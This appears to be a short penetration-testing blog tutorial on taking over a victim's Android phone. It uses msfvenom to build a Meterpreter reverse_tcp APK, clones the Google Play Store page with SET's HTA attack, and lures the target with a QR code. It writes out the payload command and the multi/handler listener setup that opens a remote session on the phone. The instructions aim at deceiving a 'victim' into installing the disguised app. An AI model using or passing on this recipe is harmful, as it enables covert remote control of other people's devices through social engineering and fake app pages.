Kali Linux, Penetration Testing

Hack Android Phone using HTA Attack with QR Code

QR Code is a 2-dimensional barcode which can be scanned using Smartphones or dedicated QR Readers. These QR Codes are directly linked to contact numbers, websites, usernames, photos, SMS, E-mails and even encryptions but they do not end here. QR Codes are big deal in Japan and it’s just a matter of time when taking over the whole world as there is growth in SEO.

Till now every one of you must have understood that QR Codes is the ‘next big thing’, let’s make it a big thing but in regards to hacking. Yes! In this article, we are going to hack our victim’s mobile in some easy steps using QR Code. And all you need for this is your beloved Kali Linux.

Our step is to create a pernicious file using msfvenom.

msfvenom –p android/meterpreter/reverse_tcp lhost= lport=6666 > /root/Desktop/Launcher.apk

Now open SET. Through SET we will alter HTA attack into an APK attack to gain access of the victim’s Smartphone. Thus, from the SET menu select the 2nd option which indicates Website Attack Vectors?

Then further select 8th option which refers to HTA Attack Method.

And then select Site Cloner by typing 2.

When you type the said 2 option, it will ask you to enter the URL that you want to clone. Here give the URL of the play store: https://play.google.com/store

Then when it asks you to select meterpreter option type 3 as we want to select reverse_tcp.

Furthermore, save the launcher.apk file that you created using msfvenom to /var/www/html/

Also the change the name of launcher.hta to lancher.apk that your SET had just created as shown below

Now add The QR Code Extension to your chrome.

The QR Code Extension wills generate a QR Code for you according to your attack.

Now start multi/handler so you have your session in time and for this type:

use multi/handler
set payload android/meterpreter/reverse_tcp
set lhost
set lport 6666

Now you can move ahead and make the victim scan your code. And install the app.

And Voila!! As soon as scanning of the code will be completed, you will have your meterpreter session.

Author: Shivam Gupta is An Ethical HackerCyber Security Expert, Penetration Tester, India. you can contact here